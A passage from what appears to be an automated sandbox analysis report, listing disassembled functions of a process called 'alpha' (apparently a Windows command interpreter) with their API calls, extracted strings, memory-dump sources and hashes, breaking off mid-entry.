                                        • Opcode Fuzzy Hash: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                        • Instruction Fuzzy Hash: E9F1A532B0C68289EB64EF21D8902E9B7A5FF457A8F844135DF6D87695EF38E604C710
                                        Function 00007FF7CD4AAA30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 123registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7CD4AAA85
                                        • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7CD4AAACF
                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7CD4AAAEC
                                        • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7CD4A98C0), ref: 00007FF7CD4AAB39
                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7CD4A98C0), ref: 00007FF7CD4AAB6F
                                        • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7CD4A98C0), ref: 00007FF7CD4AABA4
                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7CD4A98C0), ref: 00007FF7CD4AABCB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CloseDeleteValue$CreateOpen
                                        • String ID: %s=%s
                                        • API String ID: 1019019434-1087296587
                                        • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                        • Instruction ID: f007e954e358e46a7d53308fe7ab0e7ccf58a36e443dc75a377490044dfa2c28
                                        • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                        • Instruction Fuzzy Hash: 31519431B0CB4296E760AF65E44576AF6A2FB897A0F808235CF6D83791EF38D5418710
                                        Function 00007FF7CD484A30 Relevance: 10.8, APIs: 7, Instructions: 318COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$FullNamePathwcsrchr
                                        • String ID:
                                        • API String ID: 4289998964-0
                                        • Opcode ID: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                        • Instruction ID: 885a15515db1fc1cf5403e128357c2e0dcc0e3501cf21938d8f32ac7cc322c9e
                                        • Opcode Fuzzy Hash: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                        • Instruction Fuzzy Hash: A7C1E511B0E35682EE94BF52958837AA3A1FB54BA0F846534CF2E477D0FF3CA6519320
                                        Function 00007FF7CD48D250 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsicmp
                                        • String ID: GeToken: (%x) '%s'
                                        • API String ID: 2081463915-1994581435
                                        • Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                        • Instruction ID: 716967c7789859c82151f0da52f2a43000094e8ab4d65bb4dd624694a8f11cbd
                                        • Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                        • Instruction Fuzzy Hash: 5C718E20F0D64385FBA4BF65A858679A6A0AF517B4FC40539DF2D866D0FF3DE6818320
                                        Function 00007FF7CD4902A0 Relevance: 35.3, APIs: 13, Strings: 7, Instructions: 279COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsicmp$iswspacewcschr
                                        • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                        • API String ID: 840959033-3627297882
                                        • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                        • Instruction ID: 0e766ec1bde537315bd42960f145fc138c41d00b1f24689f8505c9d1c53c77cc
                                        • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                        • Instruction Fuzzy Hash: 2FD15C31B0C64386FA50BF62E8196B8B7A6AF54B64FC44035DF2D46299FE3CE6058730
                                        Function 00007FF7CD4832B0 Relevance: 27.2, APIs: 18, Instructions: 243COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00007FF7CD493578: _get_osfhandle.MSVCRT ref: 00007FF7CD493584
                                          • Part of subcall function 00007FF7CD493578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7CD49359C
                                          • Part of subcall function 00007FF7CD493578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7CD4935C3
                                          • Part of subcall function 00007FF7CD493578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7CD4935D9
                                          • Part of subcall function 00007FF7CD493578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7CD4935ED
                                          • Part of subcall function 00007FF7CD493578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7CD493602
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD4832F3
                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF7CD4832A4), ref: 00007FF7CD483309
                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7CD483384
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7CD4A11DF
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                        • String ID:
                                        • API String ID: 611521582-0
                                        • Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                        • Instruction ID: 9e5799fdc5fe692cc65ee4aa0a0eecbb6b4a2efd42280abfbdbf4bb7a08923ea
                                        • Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                        • Instruction Fuzzy Hash: 93A1A532B0CA12D6E714AF61E8182BDF6A2FB49BA5F844135CF1E86754EF3CA545C720
                                        Function 00007FF7CD4926E0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 187fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CreateFile_open_osfhandle
                                        • String ID: con
                                        • API String ID: 2905481843-4257191772
                                        • Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                        • Instruction ID: e45d3f9585955b137129732b92fec5b6c2eceea061c332b5446ba5eb126e827e
                                        • Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                        • Instruction Fuzzy Hash: C671B432B0C6819AE720AF16E444A79FAA5FB89B70FD44234DF6D42794EF3CD6458B10
                                        Function 00007FF7CD4B1A40 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 148COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                        • String ID: CSVFS$NTFS$REFS
                                        • API String ID: 3510147486-2605508654
                                        • Opcode ID: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                        • Instruction ID: 1c22528e862d587adf3acb1f355e0125976161ad6b1ffcb9e14f0c77530023f2
                                        • Opcode Fuzzy Hash: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                        • Instruction Fuzzy Hash: A9613832708B829AEB619F61D8443E9B7A5FB5AB94F844036DF1E4B758EF38D604C710
                                        Function 00007FF7CD4872B0 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 283COMMON
                                        Download Yara Rule
                                        APIs
                                        • longjmp.MSVCRT(?,00000000,00000000,00007FF7CD487279,?,?,?,?,?,00007FF7CD48BFA9), ref: 00007FF7CD4A4485
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: longjmp
                                        • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                        • API String ID: 1832741078-366822981
                                        • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                        • Instruction ID: b6669f0f639bd16b9f4470d5b703d6d1191d4d1d6d9add8318ee690f68694a1c
                                        • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                        • Instruction Fuzzy Hash: B6C1D124F0C68281EA24FF9655906BCE791AB56BE4FD4003ACF2D97691EF2CE745C321
                                        Function 00007FF7CD49662C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 170COMMON
                                        Download Yara Rule
                                        APIs
                                        • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF7CD496570,?,?,?,?,?,?,00000000,00007FF7CD496488), ref: 00007FF7CD496677
                                        • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF7CD496570,?,?,?,?,?,?,00000000,00007FF7CD496488), ref: 00007FF7CD49668F
                                        • _errno.MSVCRT ref: 00007FF7CD4966A3
                                        • wcstol.MSVCRT ref: 00007FF7CD4966C4
                                        • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF7CD496570,?,?,?,?,?,?,00000000,00007FF7CD496488), ref: 00007FF7CD4966E4
                                        • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF7CD496570,?,?,?,?,?,?,00000000,00007FF7CD496488), ref: 00007FF7CD4966FE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                        • String ID: +-~!$APerformUnaryOperation: '%c'
                                        • API String ID: 2348642995-441775793
                                        • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                        • Instruction ID: 74709389e48ee26bd2dc1a6278de5a0464d34172f47dfc48489da7e0b6f9f190
                                        • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                        • Instruction Fuzzy Hash: 0D718362A0CA4685EB606F22D41097DF7A6EB45B64F94C031EF6E02294FF3CE684C720
                                        Function 00007FF7CD4886B0 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 138memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$_wcsicmp$AllocProcess
                                        • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                        • API String ID: 3223794493-3086019870
                                        • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                        • Instruction ID: 0ffe4b1291e5888e2e7688b67602be77c25072ee032d1fb69f647d5d7abe934a
                                        • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                        • Instruction Fuzzy Hash: AD517125B0CA4285EA54AF16A814179FBA1FB59BA0F945135CF7E433A1FF3CE241C720
                                        Function 00007FF7CD4A86FC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 226timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: LocalTime$ErrorLast_get_osfhandle
                                        • String ID: %s$/-.$:
                                        • API String ID: 1644023181-879152773
                                        • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                        • Instruction ID: e3d4d9ca030e3dd7ab4349f6768e18e0359e114650b94093bab6ea9c4c24d5be
                                        • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                        • Instruction Fuzzy Hash: 26917062B0C64296EF14AF65D4402B9E6A1FF84BA4FC44036DF6E46694FE3CE746C720
                                        Function 00007FF7CD4A627C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95synchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7CD4A7251), ref: 00007FF7CD4A628E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ObjectSingleWait
                                        • String ID: wil
                                        • API String ID: 24740636-1589926490
                                        • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                        • Instruction ID: c1a5643916b3f65453a3fb75d115c81a5fee84c2f47e3e39f8e025539825f153
                                        • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                        • Instruction Fuzzy Hash: A6415021B0CD4283F3606F55E40427AB6A2EF957A0FE08131DF2E466D4EF3DEA498721
                                        Function 00007FF7CD487AA0 Relevance: 15.2, APIs: 10, Instructions: 221COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CreateDirectoryDriveFullNamePathTypememset
                                        • String ID:
                                        • API String ID: 1397130798-0
                                        • Opcode ID: 1e06caf0b77d17d600aef2fcb22a4425febc896dd4a75ac9af5e73f825b2a127
                                        • Instruction ID: 3ed01021f312f1b4842f9bc815fe1aab97610ed01205ce321e8b16a9192a42ef
                                        • Opcode Fuzzy Hash: 1e06caf0b77d17d600aef2fcb22a4425febc896dd4a75ac9af5e73f825b2a127
                                        • Instruction Fuzzy Hash: 5091A322B0CB8196EA65BF1198516B9F3A6FB44BA4F848035DF5E43794FF3CE6408720
                                        Function 00007FF7CD497E80 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00007FF7CD48D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7CD48D46E
                                          • Part of subcall function 00007FF7CD48D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7CD48D485
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D4EE
                                          • Part of subcall function 00007FF7CD48D3F0: iswspace.MSVCRT ref: 00007FF7CD48D54D
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D569
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D58C
                                        • iswspace.MSVCRT ref: 00007FF7CD497EEE
                                        Strings
                                        Memory Dump Source
